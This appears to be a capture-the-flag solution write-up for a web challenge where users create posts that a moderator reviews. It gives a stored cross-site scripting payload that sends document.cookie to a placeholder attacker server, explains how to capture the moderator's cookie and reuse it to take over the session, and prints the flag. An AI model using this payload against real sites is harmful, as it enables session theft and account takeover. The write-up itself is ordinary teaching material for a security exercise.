39 lines
1.5 KiB
Markdown
39 lines
1.5 KiB
Markdown
|
## Difficulty
|
||
|
|
|
||
|
|
Difficult
|
||
|
|
90 punten
|
||
|
|
|
||
|
|
## How to solve
|
||
|
|
|
||
|
|
The challenge consists of small web application where you can register and login.
|
||
|
|
First you will need to register for a new account, as you don't know any account
|
||
|
|
credentials yet. After doing so you will be redirected to the login page
|
||
|
|
where you can use those credentials to log in.
|
||
|
|
|
||
|
|
After loggin in, you will be presented with a page that lists your posts. At first,
|
||
|
|
this page will be empty, but new posts can be created using the "Create post" link.
|
||
|
|
|
||
|
|
To solve the challenge, you will need to create a posts that contains Javascript,
|
||
|
|
for example like this:
|
||
|
|
|
||
|
|
```
|
||
|
|
<script>
|
||
|
|
window.top.location = "http://SOME_IP:SOME_PORT/?q="+document.cookie;
|
||
|
|
</script>
|
||
|
|
```
|
||
|
|
|
||
|
|
You will see that when you view an individual post, this HTML gets rendered
|
||
|
|
and will be executed on the client side of whomever is viewing the page.
|
||
|
|
As each post needs to be reviewed by a moderator, we hope that the page
|
||
|
|
gets viewed by a moderator, and that the Javascript gets executed, therefore
|
||
|
|
stealing the cookie details of the moderator.
|
||
|
|
|
||
|
|
For this to work, you will need an external server that is accesible from
|
||
|
|
the internet on `SOME_IP:SOME_PORT` and logs all of the request information
|
||
|
|
so that you can view it. At some point, the moderator will log in and
|
||
|
|
view your post containing the malicious Javascript, at this point, the
|
||
|
|
cookie is leaked and can be replaced in your on browser (through the developer tools for example).
|
||
|
|
|
||
|
|
## Flag
|
||
|
|
IGCTF{BigTechWillnOtSiLenceUs}
|